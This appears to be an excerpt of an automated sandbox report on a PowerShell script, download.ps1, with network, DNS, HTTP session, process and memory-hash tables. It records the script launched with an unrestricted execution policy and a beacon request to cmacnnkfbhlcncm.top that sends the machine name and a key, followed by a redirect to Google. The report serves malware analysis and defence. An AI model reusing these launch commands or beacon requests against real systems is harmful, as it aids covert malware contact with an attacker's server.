                                                                                                                Dec 22, 2024 13:42:11.893659115 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.893712044 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.893764973 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:12.222053051 CET4973080192.168.2.445.61.136.138
                                                                                                                Dec 22, 2024 13:42:12.222500086 CET4973180192.168.2.4172.217.19.228
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 22, 2024 13:42:07.577435017 CET6457753192.168.2.41.1.1.1
                                                                                                                Dec 22, 2024 13:42:07.977735043 CET53645771.1.1.1192.168.2.4
                                                                                                                Dec 22, 2024 13:42:09.368364096 CET6236753192.168.2.41.1.1.1
                                                                                                                Dec 22, 2024 13:42:09.506589890 CET53623671.1.1.1192.168.2.4
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 22, 2024 13:42:07.577435017 CET192.168.2.41.1.1.10x1251Standard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                                                                Dec 22, 2024 13:42:09.368364096 CET192.168.2.41.1.1.10xcabStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 22, 2024 13:42:07.977735043 CET1.1.1.1192.168.2.40x1251No error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                Dec 22, 2024 13:42:09.506589890 CET1.1.1.1192.168.2.40xcabNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                • cmacnnkfbhlcncm.top
                                                                                                                • www.google.com
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.44973045.61.136.138806884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 22, 2024 13:42:08.116451979 CET215OUTGET /jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527 HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                Host: cmacnnkfbhlcncm.top
                                                                                                                Connection: Keep-Alive
                                                                                                                Dec 22, 2024 13:42:09.366614103 CET166INHTTP/1.1 302 Found
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Sun, 22 Dec 2024 12:42:09 GMT
                                                                                                                Content-Length: 0
                                                                                                                Connection: keep-alive
                                                                                                                Location: http://www.google.com


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449731172.217.19.228806884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 22, 2024 13:42:09.630008936 CET159OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                Host: www.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Dec 22, 2024 13:42:11.460381031 CET1236INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 22 Dec 2024 12:42:11 GMT
                                                                                                                Expires: -1
                                                                                                                Cache-Control: private, max-age=0
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-aOoBqs0PzWzSw4eoMOAGxg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                Server: gws
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Set-Cookie: AEC=AZ6Zc-VEVAXJ_rbWgXmfG1zFS2rWzYkWz3_zFpxp2Y9NSeu04XFCNfbOog; expires=Fri, 20-Jun-2025 12:42:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                Set-Cookie: NID=520=GwNp1VUlauufdcFxXIZdWtWZn5XDpT1kVw9G7RxD9On7UoHynKHkxOvGqmIA42IGvnVQGPhmaDYbjPkGVUn6SY5NLesRDlVrMZBFuBancM9FYSrjAOKXWwmii329bb5vw-SjGVXyaJ8Zno2Stjn2SZz1m5nanIEpA3LSGC5fom8UMt6X7Tw8TtQa3b2Whxfi0rhs0NQd; expires=Mon, 23-Jun-2025 12:42:10 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                Accept-Ranges: none
                                                                                                                Vary: Accept-Encoding
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Data Raw: 33 39 36 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76
                                                                                                                Data Ascii: 396f<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, v
                                                                                                                Dec 22, 2024 13:42:11.460499048 CET1236INData Raw: 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75
                                                                                                                Data Ascii: ideos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/log
                                                                                                                Dec 22, 2024 13:42:11.460515976 CET1236INData Raw: 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 61 4f 6f 42 71 73 30 50 7a 57 7a 53 77 34 65 6f 4d 4f 41 47 78 67 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 49 67 6c 6f 5a 38 54 30 50 4d 71 48 34
                                                                                                                Data Ascii: itle><script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var _g={kEI:'IgloZ8T0PMqH4dUPvuTG0Ak',kEXPI:'0,202747,606135,2891422,645,435,538661,2872,2891,8348,34680,390923,45786,109183,3801,2412,50869,7734,25,18648,8861,11814,1635,29276,27083,5213
                                                                                                                Dec 22, 2024 13:42:11.460557938 CET1236INData Raw: 38 38 2c 31 30 33 38 2c 31 31 30 2c 32 2c 35 30 2c 39 38 33 2c 33 32 2c 33 39 2c 37 31 2c 36 30 33 2c 35 34 2c 31 36 39 2c 32 34 34 2c 32 33 36 2c 39 34 2c 33 36 32 2c 34 39 32 2c 33 34 30 2c 31 33 39 2c 33 30 2c 35 34 30 2c 32 31 31 2c 33 33 2c
                                                                                                                Data Ascii: 88,1038,110,2,50,983,32,39,71,603,54,169,244,236,94,362,492,340,139,30,540,211,33,1625,332,29,853,532,1120,310,1410,18,20990155,359915,37198,18,2780,702,868,5240,40,159,554,1774,8,2065,3,1202,802,5985837,2038088',kBL:'2zYe',kOPI:89978449};(fun
                                                                                                                Dec 22, 2024 13:42:11.460633039 CET1236INData Raw: 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64
                                                                                                                Data Ascii: ll};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)
                                                                                                                Dec 22, 2024 13:42:11.460649967 CET1236INData Raw: 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 41 22 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64
                                                                                                                Data Ascii: document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absol
                                                                                                                Dec 22, 2024 13:42:11.460882902 CET1236INData Raw: 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31
                                                                                                                Data Ascii: x rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;positio
                                                                                                                Dec 22, 2024 13:42:11.460899115 CET1236INData Raw: 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 7a 74 2c 2e 67 62 67 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f
                                                                                                                Data Ascii: -webkit-box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbzt,.gbgt{cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*d
                                                                                                                Dec 22, 2024 13:42:11.460915089 CET1236INData Raw: 73 2c 23 67 62 69 34 73 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70
                                                                                                                Data Ascii: s,#gbi4s1{font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;background-image:none}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding
                                                                                                                Dec 22, 2024 13:42:11.460932016 CET1236INData Raw: 6f 6c 6f 72 3a 23 33 36 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62
                                                                                                                Data Ascii: olor:#36c !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:vis
                                                                                                                Dec 22, 2024 13:42:11.580414057 CET1236INData Raw: 69 67 68 74 3a 32 37 70 78 7d 2e 47 42 4d 43 43 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d
                                                                                                                Data Ascii: ight:27px}.GBMCC:last-child:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-bottom:1px solid #


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:07:42:00
                                                                                                                Start date:22/12/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                Imagebase:0x7ff788560000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:07:42:01
                                                                                                                Start date:22/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Reset < >
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f1f0874344f883a05e685e2b613199f148cfa08bb68828b90bd3fc89d56bf099
                                                                                                                  • Instruction ID: 688779b593aeb44fcb37e3d9ee87c041826c10d51617a8d348dac063e1cb39b2
                                                                                                                  • Opcode Fuzzy Hash: f1f0874344f883a05e685e2b613199f148cfa08bb68828b90bd3fc89d56bf099
                                                                                                                  • Instruction Fuzzy Hash: BCF1A670A19A4D8FEBA8EF28D8557F937E1FF58310F04426EE84DC7295DB3499418B82
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cd21d68136fe8e9ce73397190814f19feb6313a69565f2b0d904184aaa36110f
                                                                                                                  • Instruction ID: 746ca4a75566179b8155647b9551f67b09c5f9bdff73e5a2ccddf8ba62956ada
                                                                                                                  • Opcode Fuzzy Hash: cd21d68136fe8e9ce73397190814f19feb6313a69565f2b0d904184aaa36110f
                                                                                                                  • Instruction Fuzzy Hash: 80E1C670A09A4D8FEBA8EF28C8557F977D1FF58310F04426EE84DC7295DB74A9418B81
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1903283011.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9bb20000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $_3
                                                                                                                  • API String ID: 0-2531839943
                                                                                                                  • Opcode ID: 8774b55c05bbed11e5728a6fde7c4b5ade58635dc66d43da8ebd4e530f424d57
                                                                                                                  • Instruction ID: 34e875fc72f3350237c2c5826af4f1db8563b28116f35ced21da14124a3362ab
                                                                                                                  • Opcode Fuzzy Hash: 8774b55c05bbed11e5728a6fde7c4b5ade58635dc66d43da8ebd4e530f424d57
                                                                                                                  • Instruction Fuzzy Hash: 8A92F371B09A894FEBA9EB688865A6877E1FF64304F1940FDD02DC72E3DE25AC45C701
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f427daba84def64a9795d0664debc44f6430906ff88d0db3f80cbfe229e08dd2
                                                                                                                  • Instruction ID: 8a3e6e55eca82f576fb1a566b1eedc20bc0eb37814266507cf0df1896877bcf3
                                                                                                                  • Opcode Fuzzy Hash: f427daba84def64a9795d0664debc44f6430906ff88d0db3f80cbfe229e08dd2
                                                                                                                  • Instruction Fuzzy Hash: A2F1A330A18A5D8FDF98DF68C495EA9B7E1FF68300F15416AD409D72A6DA34E842CBC1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5123f75801d8d68e59618c866d3781601e7ccd1eda3e38ceb75af1b8c6c59b09
                                                                                                                  • Instruction ID: 3c90194120cbbacfca72e0365faee5e0d70bf105450132158e44f927c471f5b6
                                                                                                                  • Opcode Fuzzy Hash: 5123f75801d8d68e59618c866d3781601e7ccd1eda3e38ceb75af1b8c6c59b09
                                                                                                                  • Instruction Fuzzy Hash: 16B1C57060DA4D8FDBA9EF28C8557F93BE1FF59310F04426AE84DC7296CA349945CB82
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: daf8dba643573d83b7f521e55ea83738ec58a99836cce99dbdb479af28a83d84
                                                                                                                  • Instruction ID: 4bd41e7d28f0a5b584f4a990c11742d8c3f868613a365ea184f79a4050dc9971
                                                                                                                  • Opcode Fuzzy Hash: daf8dba643573d83b7f521e55ea83738ec58a99836cce99dbdb479af28a83d84
                                                                                                                  • Instruction Fuzzy Hash: 2931F47191CB4C8FDB189F5C9C0A6A87BE0FB59720F00426FE449C32A2DB70A855CBC2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1899468159.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b79d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 024a98fbdff0e67775caae562f431b1cf06f678eb75bf85e70aeb960d08dd53a
                                                                                                                  • Instruction ID: 84fb81cdd1d19fa27c47fc41406d5c2f3610680320cf341eba08bcea6987383c
                                                                                                                  • Opcode Fuzzy Hash: 024a98fbdff0e67775caae562f431b1cf06f678eb75bf85e70aeb960d08dd53a
                                                                                                                  • Instruction Fuzzy Hash: 8C41277140EBC44FE7668B39D8559523FF0EF52320B1A06DFD088CB1B3D625A84AC7A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b667bf7c2ab89b5be17ef79054b15b76682b78c86534ecbca9a836befea221f5
                                                                                                                  • Instruction ID: 77d2c6872a90c5ca0a8d1e9a4768515658a2d8d54d25aeb07314e6b33dfeaf63
                                                                                                                  • Opcode Fuzzy Hash: b667bf7c2ab89b5be17ef79054b15b76682b78c86534ecbca9a836befea221f5
                                                                                                                  • Instruction Fuzzy Hash: 0021F43090CB4C8FDB58DF9C98496E97BE0EB99321F04826FD408C3196C6709446CB81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3b5f31d2acc2f9d98ecb5a01e979a411e70721fd884d96104ed1728af390f306
                                                                                                                  • Instruction ID: fdeb102149418f8e07132871ac0d715c651dd20e3d47adc34344dd7919fe4332
                                                                                                                  • Opcode Fuzzy Hash: 3b5f31d2acc2f9d98ecb5a01e979a411e70721fd884d96104ed1728af390f306
                                                                                                                  • Instruction Fuzzy Hash: BE310170A5964E8EFBB4EF65CC29BF93290FF49319F41113AD40D860A2DA386A46CB11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 992f195512c971f49469e0ecea812c0d9e71d7d3947c1ecfbb816604722e8fed
                                                                                                                  • Instruction ID: 08d82c273694205943434ba9736a87bdc53665732f112773137b2268cfb64220
                                                                                                                  • Opcode Fuzzy Hash: 992f195512c971f49469e0ecea812c0d9e71d7d3947c1ecfbb816604722e8fed
                                                                                                                  • Instruction Fuzzy Hash: 0B01677121CB0C4FD748EF0CE451AA5B7E0FB99364F10056EE58AC76A5D636E881CB45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a4e1c04ebbfeab0ff79f0382b62a7850cdadc1128a5a077832a2a65a333a5491
                                                                                                                  • Instruction ID: d4104438915cf4f6b23ec9677d79813e9a34bb69b8619ea14847b2799f6afe5b
                                                                                                                  • Opcode Fuzzy Hash: a4e1c04ebbfeab0ff79f0382b62a7850cdadc1128a5a077832a2a65a333a5491
                                                                                                                  • Instruction Fuzzy Hash: FAF0373275C6048FDB5CAA1CF8529B573D1E799324B14017EE48BC3696D917E8428685
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1903612485.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9bb60000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5a867f300ca7ac0b66ec3a8b04d63eb38338904506914c12beda82124e7f2efc
                                                                                                                  • Instruction ID: b477512d3549329e377b962e6bc919fd596d3b96e7cebc59968097abc891c5b9
                                                                                                                  • Opcode Fuzzy Hash: 5a867f300ca7ac0b66ec3a8b04d63eb38338904506914c12beda82124e7f2efc
                                                                                                                  • Instruction Fuzzy Hash: 68F0B432B0D5498FEB68EB9CE8559A873E0FF4533471500B6E15CC74B7CA25AC01C740
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d9b7f5317121e263c9165b73132b01c174230823c1796e5132472167dced9c0a
                                                                                                                  • Instruction ID: 36a003cdf0d7582be1b5aea91d29673171a41f6b19fdcfb8cbecae3e74e3e8c7
                                                                                                                  • Opcode Fuzzy Hash: d9b7f5317121e263c9165b73132b01c174230823c1796e5132472167dced9c0a
                                                                                                                  • Instruction Fuzzy Hash: 8BF02B7080D6CE4FDB16EF6888194E47FA0FF1A210B05029BE45CC70F2DB649554C7C2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1903612485.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9bb60000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dbc00d39866251a5dec8b5061f88c77b324a8508608afa5972ba868e5ffdaf83
                                                                                                                  • Instruction ID: 352da2ffdf9cc087f5f60f937b7cd836c5cf1dd1347b145441cd09a681743ea4
                                                                                                                  • Opcode Fuzzy Hash: dbc00d39866251a5dec8b5061f88c77b324a8508608afa5972ba868e5ffdaf83
                                                                                                                  • Instruction Fuzzy Hash: 1EF05E32B0E5498FE769EA9CE4518A877E0FF0533471500B6E15DCB5A3DA26AC40C750
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1903612485.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9bb60000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4c47430feccae71ef5b28b75122dbe5648755e127193adf1c00e072a70bc519e
                                                                                                                  • Instruction ID: f421e5b2e4cfee2ab20323b9f6a5a3ee76e8d36ee2ce23ce649d1be1376d0151
                                                                                                                  • Opcode Fuzzy Hash: 4c47430feccae71ef5b28b75122dbe5648755e127193adf1c00e072a70bc519e
                                                                                                                  • Instruction Fuzzy Hash: 23C08C7100BAC05BC306F730810AC0BFE144F5265872804CDE0425F092C1030004C318
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: K_^$K_^$K_^$K_^$K_^$K_^
                                                                                                                  • API String ID: 0-3805565700
